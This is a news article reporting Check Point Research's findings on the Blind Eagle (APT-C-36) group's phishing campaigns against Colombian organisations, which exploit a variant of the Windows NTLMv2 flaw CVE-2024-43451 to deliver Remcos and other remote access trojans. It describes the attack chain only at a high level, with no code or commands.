Blind Eagle APT Exploits Windows Vulnerability in High-Impact Attacks on Colombian Entities

A threat actor suspected to originate from South America, known as Blind Eagle (APT-C-36), has been actively targeting Colombian government institutions and private organizations in a wave of cyberattacks, according to a report published by Check Point Research on March 10.

  South America Cyber affairs News   Mar 11, 2025  Add to Reading List
Blind Eagle APT Exploits Windows Vulnerability in High-Impact Attacks on Colombian Entities

threat actor suspected to originate from South America, known as Blind Eagle (APT-C-36), has been actively targeting Colombian government institutions and private organizations in a wave of cyberattacks, according to a report published by Check Point Research on March 10.

Investigations into Blind Eagle’s activities, which stretch back to November 2024, revealed the group leveraging a variant of CVE-2024-43451, a vulnerability in Windows NTLMv2 authentication that was originally patched by Microsoft on November 12, 2024. Despite its focus on high-profile government targets, the group's recent campaigns have achieved significant infection rates in a short time frame, compromising over 1,600 victims in a single attack on December 19, 2024.

Blind Eagle's Cyber Espionage Tactics

Operating since 2018, Blind Eagle is an advanced persistent threat (APT) group specializing in cyberespionage and cybercrime. It has consistently targeted government institutions, financial entities, and critical infrastructure across Colombia and Latin America. The group is known for its highly deceptive social engineering techniques, primarily deploying phishing emails embedded with malicious links or attachments to gain unauthorized access to target systems.

Their malware arsenal includes widely used Remote Access Trojans (RATs) such as NjRAT, AsyncRAT, and Remcos, which enable full control over infected systems.

Exploiting CVE-2024-43451

Blind Eagle's recent campaigns involve a variant of the Windows NTLMv2 vulnerability (CVE-2024-43451), initially exploited by other threat actors against Ukrainian entities in 2024. The original vulnerability relied on malicious .url files, which could be triggered through seemingly harmless user actions such as right-clicking, deleting, or dragging-and-dropping a file.

Six days after Microsoft released a security patch, Blind Eagle began using an altered version of the exploit. While this variant does not expose NTLMv2 hashes, it still signals to attackers when a user downloads the malicious file and can execute malware regardless of whether the victim's system is patched. The malware deployment sequence follows this pattern:

  1. A phishing email tricks the victim into believing they made a payment.
  2. The email includes an attached receipt containing a malicious .url file.
  3. Once opened, the file triggers multiple malicious executables, leading to the deployment of a .NET RAT that gathers system data.
  4. In the final stage, the malware Remcos RAT is executed, connecting the infected device to a command-and-control (C&C) server and a botnet.

Evading Detection & Security Implications

One of Blind Eagle’s key strengths lies in its ability to bypass traditional security measures by leveraging legitimate file-sharing services such as Google Drive, Dropbox, and GitHub. Many of the .url files used in these attacks remain undetected by major antivirus solutions, including those on VirusTotal.

Check Point describes Blind Eagle as a critical cybersecurity threat and recommends that organizations strengthen their defenses through:

  • Proactive threat intelligence
  • Advanced security defenses
  • Continuous monitoring

The research also includes Indicators of Compromise (IoCs) to help defenders identify potential threats in their environments.

By combining social engineering, stealthy malware delivery methods, and legitimate cloud platforms, Blind Eagle continues to evolve its tactics, making it a persistent and formidable threat to organizations in Colombia and beyond.